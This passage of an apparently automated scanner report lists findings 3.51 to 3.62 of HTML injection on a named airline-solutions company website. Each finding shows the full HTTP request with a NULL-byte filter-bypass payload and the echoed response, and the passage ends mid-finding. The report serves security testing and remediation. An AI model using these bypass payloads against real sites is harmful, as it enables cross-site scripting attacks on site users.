GET /home/business_issues/revenue_growth?%00ddcb8<a>b66fa2a9b31=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a>b66fa2a9b31=1">revenue growth?%00ddcb8<a>b66fa2a9b31=1</a> ...[SNIP]...
3.51. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/revenue_growth
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00282cf"><a>70df90e6b20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 282cf"><a>70df90e6b20 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/revenue_growth?%00282cf"><a>70df90e6b20=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a href="/home/business_issues/revenue_growth?%00282cf"><a>70df90e6b20=1"> ...[SNIP]...
3.52. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/revenue_growth/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dd32d"><a>ee461130351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd32d"><a>ee461130351 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/revenue_growth/?%00dd32d"><a>ee461130351=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a href="/home/business_issues/revenue_growth/?%00dd32d"><a>ee461130351=1"> ...[SNIP]...
3.53. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/revenue_growth/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00cfc96<a>b6269248590 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfc96<a>b6269248590 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/revenue_growth/?%00cfc96<a>b6269248590=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a>b6269248590=1">?%00cfc96<a>b6269248590=1</a> ...[SNIP]...
3.54. http://www.sabreairlinesolutions.com/home/contact [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e1da"><a>9ac32faf577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e1da"><a>9ac32faf577 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact?%002e1da"><a>9ac32faf577=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact?%002e1da"><a>9ac32faf577=1"> ...[SNIP]...
3.55. http://www.sabreairlinesolutions.com/home/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004f026<a>f0cf889536 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4f026<a>f0cf889536 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/?%004f026<a>f0cf889536=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321409; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>f0cf889536=1">?%004f026<a>f0cf889536=1</a> ...[SNIP]...
3.56. http://www.sabreairlinesolutions.com/home/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008f3cb"><a>f542c5fd65d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f3cb"><a>f542c5fd65d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/?%008f3cb"><a>f542c5fd65d=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321409; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/?%008f3cb"><a>f542c5fd65d=1"> ...[SNIP]...
3.57. http://www.sabreairlinesolutions.com/home/contact/airline_distribution [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/airline_distribution
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f8621"><a>0262ec90d8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8621"><a>0262ec90d8c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/airline_distribution?%00f8621"><a>0262ec90d8c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321476; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/airline_distribution?%00f8621"><a>0262ec90d8c=1"> ...[SNIP]...
3.58. http://www.sabreairlinesolutions.com/home/contact/airline_distribution [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/airline_distribution
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0072bb9<a>62a409e2a4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72bb9<a>62a409e2a4b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/airline_distribution?%0072bb9<a>62a409e2a4b=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321476; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>62a409e2a4b=1">airline distribution?%0072bb9<a>62a409e2a4b=1</a> ...[SNIP]...
3.59. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/airline_distribution/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f69a5<a>8da31d06484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f69a5<a>8da31d06484 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/airline_distribution/?%00f69a5<a>8da31d06484=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321432; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>8da31d06484=1">?%00f69a5<a>8da31d06484=1</a> ...[SNIP]...
3.60. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/airline_distribution/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0028f11"><a>3cc3486bb3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28f11"><a>3cc3486bb3c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/airline_distribution/?%0028f11"><a>3cc3486bb3c=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/contact Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321432; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/airline_distribution/?%0028f11"><a>3cc3486bb3c=1"> ...[SNIP]...
3.61. http://www.sabreairlinesolutions.com/home/contact/airports [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/airports
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007fa3b"><a>75d7acc3fac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fa3b"><a>75d7acc3fac in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/contact/airports?%007fa3b"><a>75d7acc3fac=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321483; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/contact/airports?%007fa3b"><a>75d7acc3fac=1"> ...[SNIP]...
3.62. http://www.sabreairlinesolutions.com/home/contact/airports [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/contact/airports
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ab78d<a>f372b6bb1f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab78d<a>f372b6bb1f8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
